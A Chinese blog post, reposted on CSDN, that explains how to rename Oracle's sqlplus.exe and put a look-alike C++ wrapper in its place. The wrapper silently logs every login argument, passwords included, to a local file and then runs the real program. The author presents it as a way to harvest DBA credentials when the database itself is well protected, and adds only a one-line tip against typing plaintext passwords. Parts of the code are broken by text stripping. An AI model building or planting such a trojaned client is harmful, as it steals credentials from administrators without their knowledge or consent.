sqlplus连mysql库_SQLPlus得到数据库登录信息

最新推荐文章于 2023-01-13 11:09:03 发布
最新推荐文章于 2023-01-13 11:09:03 发布
阅读量130 收藏
点赞数
文章标签: sqlplus连mysql库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39820226/article/details/114000432
版权

当DBA登录本地或远程数据库时,为了省事,用sqlplus 用户名/密码@连接服务名 的方式登录数据库是再平常不过了,而我们如果将Or

当DBA登录本地或远程数据库时,为了省事,用"sqlplus 用户名/密码@连接服务名" 的方式登录数据库是再平常不过了,而我们如果将Oracle的SQLPlus换成我们自己的实现,然后当使用时,记录下它的登录信息,就得到了数据库的用户名,密码等信息。

这是一种很简单的,偷龙转凤的方式,有其局限性。但有时,,如果数据库本身的防护很严,从DBA客户端这边下手,利用这种方式有时也能有意外的收获。

效果图:

这种方式跑起来和Oracle原来的是一模一样的. 光看是看不来什么地。

c4353d8a9e88098082bcee0fa9bd2f21.png

被记录下的登录信息:

fcdb5955cf1d719186e9fbd1c18aa667.png

代码如下:

/**

*author: xiongchuanliang

*desc: 用自定义的sqlplus替换掉Oracle原版的,并在自定义的程序中记录下用户的登录信息的演示

1. 找到Oracle自带的sqlplus.exe,将其命名为其它文件

2. 用自定义的替换掉原版

*/

#include #include

#include

#include #include using namespace std;

HRESULT CMDEx(const char *pCmd) ;

//将原版的sqlplus.exe改为sqlplus_ora.exe";

const string sqlplus_path = "C:/oracle/product/11.2.0/dbhome_1/BIN/sqlplus_ora.exe";

const string oper_log = "C:/mysqlplus.log";

int main(int argc,char* argv[])

{

string sqlplus_cmd = sqlplus_path;

ofstream flog(oper_log,ios::app);

SYSTEMTIME sys;

if(flog){

GetLocalTime(&sys);

flog< }

for(int i=1;i {

sqlplus_cmd.append(" ");

sqlplus_cmd.append(argv[i]);

if(flog) flog< }

if(flog){

flog< flog.close();

}

cout<< "演示:%s\n"< CMDEx(sqlplus_cmd.c_str());

return 0;

}

HRESULT CMDEx(const char *pCmd) //LPCTSTR pszCMD

{

#if defined(WIN32) || defined(WIN64)

if(pCmd == NULL || pCmd[0] == 0)

{

return S_FALSE;

}

STARTUPINFOA si;

PROCESS_INFORMATION pi;

HANDLE hRead, hWrite;

SECURITY_ATTRIBUTES sa = {0, NULL, TRUE};

//创建匿名管道

if(!CreatePipe(&hRead, &hWrite, &sa, 0))

{

return S_FALSE;

}

ZeroMemory( &pi, sizeof(pi) );

ZeroMemory(&si, sizeof(STARTUPINFO));

si.cb = sizeof(STARTUPINFO);

si.wShowWindow = SW_HIDE;

si.hStdOutput = hWrite;

si.hStdError = hWrite;

si.hStdInput = hRead;

si.dwFlags = STARTF_USESHOWWINDOW;

char szCMD[1024] = {0};

sprintf_s(szCMD,1024,"cmd.exe /C %.1000s",pCmd);

//创建进程执行命令

if(CreateProcessA(NULL,szCMD , NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))

{

//等待命令执行完成

WaitForSingleObject(pi.hProcess, INFINITE);

CloseHandle(hWrite);

DWORD dwRet, dwReaded;

char szBuf[256] = {0};

//获取进程执行返回值

GetExitCodeProcess(pi.hProcess, &dwRet);

//读取控制台终端输出

while(ReadFile(hRead, szBuf, 255, &dwReaded, NULL))

{

szBuf[dwReaded] = 0;

//输入命令内容到屏幕

cout<< szBuf < memset(szBuf,0,256);

}

CloseHandle(hRead);

return HRESULT_FROM_WIN32(dwRet);

}

else

{

CloseHandle(hWrite);

CloseHandle(hRead);

return(HRESULT_FROM_WIN32(GetLastError()));

}

#else

return 0;

#endif

}

这仅演示了下基本功能,以此类推,其它数据库的一些命令行程序也可以用这种方式做,对这种方式最好的防护方法是在输入连接字符串时不输入明文的密码。

logo.gif

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

weixin_39820226
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sqlplus_登录数据库
12-01
Sqlplus_登录数据库
使用sqlplus连接数据库
weixin_34259559的博客
07-05 87
方法1: sqlplus sjtu/sjtu@'(description=(address_list=(address=(protocol=tcp)(host=192.168.0.77)(port=1521)))(connect_data=(service_name=SJTU)))'  如下图所示: 方法2: sqlplus sjtu/[email protected]:...
sqlplus 连接远程数据库系统
zhongkeruan001的博客
08-17 694
************************************ 方式一:简易连接,不用进行网络配置,其实就是tnsname.ora文件,但只支持oracle10G以上。命令:sqlplus 用户名/密码@ip地址[:端口]/service_name [as sysdba]示例:sqlplus sys/pwd@ip:1521/test as sysdba 备注:使用默认1521端口时可省...
sqlplus 连接数据库
Xiang想
01-13 1535
sqlplus 直连数据库
Sql Plus连接数据库
u014437482的博客
04-29 664
自己扣扣上能够有可以加两个和专业相关的群,是十分重要的! 前两天做SSH项目,需要用到Oracle数据库,所以就相关的东西都需要配套。 1、安装好了之后,首先他与Mysql不一样,他自己没有界面,自然不能像Mysql一样进入界面模式,他是使用辅助工具,SQL Plus、plsql和sql Developer 等开发工具来使用。 首先,对于PLSQL.,他没有64位的,所以,我的电脑安装之后
shell脚本连接、读写、操作mysql数据库实例
09-10
主要介绍了shell脚本连接、读写、操作mysql数据库实例,本文包含连接、读取、插入、创建数据库等操作示例,需要的朋友可以参考下
datastudio 数据库通用管理工具
12-21
datastudio 是一款基于java jdbc的数据库客户端管理工具,运行程序请确保你已经成功安装了jre,datastudio可方便返利mysql,oralce,informix,db2等多种类型的数据库,使用简单,免安装的女色版哦。
oracle_to_mysql:作者注释
06-15
Oracle到Mysql 用于sqlplusmysql二进制文件的快速、最小、可调试的 Ruby 包装器,可从 Oracle 数据库中提取数据并将其插入 MySQL。 如果您有兴趣使用此工具,请通过 github 与我们联系,虽然它对我们很有用,但在...
vim数据库插件dbext_420
06-22
vim的数据库连接插件,便于数据库SQL调试,支持几乎所有的常见数据库, For instructions on installing this file, type :help add-local-help |add-local-help| inside Vim. Homepage: ...
Oracle数据库学习指南
07-04
8. Oracle 和 mysql 的一些简单命令对比参照 9. Oracle8i和Microsoft SQL Server7_0比较 10. Oracle8的不安全因素及几点说明 11. Oracle常见错误代码 12. Oracle常用Script 13. Oracle常用数据字典 14. ORACLE...
sqlplus连接数据库的几种方法
热门推荐
LiangZiBoy的博客
01-06 3万+
方法一 :  将数据库地址、端口号、SID、用户名、密码都输进去,这种方法最简单,只要有sqlplus就能使用,不需要配置。 格式:sqlplus [username]/[password]@[host]:[port]/[sid] 例:sqlplus system/[email protected]:1521/orcl 方法二 :  同方法一类似。 格式: sql
sqlplus配置连接mysql_Oracle 使用SQL*Plus连接数据库
weixin_27009347的博客
01-30 289
Oracle使用SQL*Plus连接数据库by:授客 QQ:1033553122使用sqlplus连接数据库A 方式11.开启SQL*Plus,但不连接到数据库$ sqlplus /NOLOG2.连接到数据库CONN[ECT] [logon] [AS {SYSOPER | SYSDBA}]其中logon为{username[/passwd] | /}[@connect_identifier] [e...
Oracle 使用SQL*Plus连接数据库
weixin_30530523的博客
11-18 180
Oracle使用SQL*Plus连接数据库 by:授客 QQ:1033553122 使用sqlplus连接数据库 A 方式1 1.开启SQL*Plus,但不连接到数据库 $ sqlplus /NOLOG 2.连接到数据库 CONN[ECT] [logon] [AS {SYSOPER | SYSDBA}] 其中logon为 {username[/pass...
SQLplus连接数据库
qq_42735944的博客
10-09 1938
用户名/密码@IP/实例名 (密码中有特殊字符用双引号) 例:eesmp/“Zjhjw!@818phxg”@10.208.106.76/eesmp
sqlplus连接数据库
smallmonkey
05-10 1937
sqlplus /nologconnect sys/123456 as sysdbaalter database open;如图所示:
sql*plus 链接数据库
技术博客
05-21 335
sql*plus 链接数据库 1 打开sql plus窗口  输入用户和密码。链接到数据库(默认数据库) 查看链接到的数据库是哪个?   使用sql语句 select  name  from v$database 2在命令行中打开 cmd  打开命令dos窗口  ,输入命令 sqlplus system/passwd@dbname 3 connect sys/passwd as sysb
mysqlsqlplus
最新发布
12-08
MySQLsqlplus都是数据库管理系统的客户端工具,但是它们针对的是不同的数据库系统。MySQL是一个开源的关系型数据库管理系统,而sqlplus是Oracle数据库的客户端工具。 MySQL的使用可以通过命令行或者图形化界面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值